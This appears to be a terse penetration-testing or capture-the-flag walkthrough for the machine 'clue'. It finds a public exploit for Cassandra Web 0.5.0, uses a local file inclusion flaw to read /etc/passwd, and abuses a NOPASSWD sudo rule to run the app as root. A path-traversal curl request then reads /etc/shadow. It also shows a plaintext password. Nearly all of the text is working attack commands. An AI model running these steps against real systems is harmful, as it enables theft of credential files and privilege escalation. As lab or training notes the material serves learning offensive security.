Cassandra Web
LFI
# Search for a PoC
$ searchsploit cassandra web
Cassandra Web 0.5.0 - Remote File Read | linux/webapps/49362.py
# LFI
$ python3 49362.py clue /etc/passwdSudo
# Enumerate sudo permissions
x7331@kali:/$ sudo -l
User x7331 may run the following commands on kali:
(ALL) NOPASSWD: /usr/local/bin/cassandra-web
# Start the app as sudo
x7331@clue:~$ sudo /usr/local/bin/cassandra-web --bind 0.0.0.0:7777 -u x7331 -p Passw0rd123! &
# Leverage the LFI vulnerability to access sensitive files
x7331@clue:~$ curl --path-as-is http://localhost:7777/../../../../../../../../etc/shadowLast updated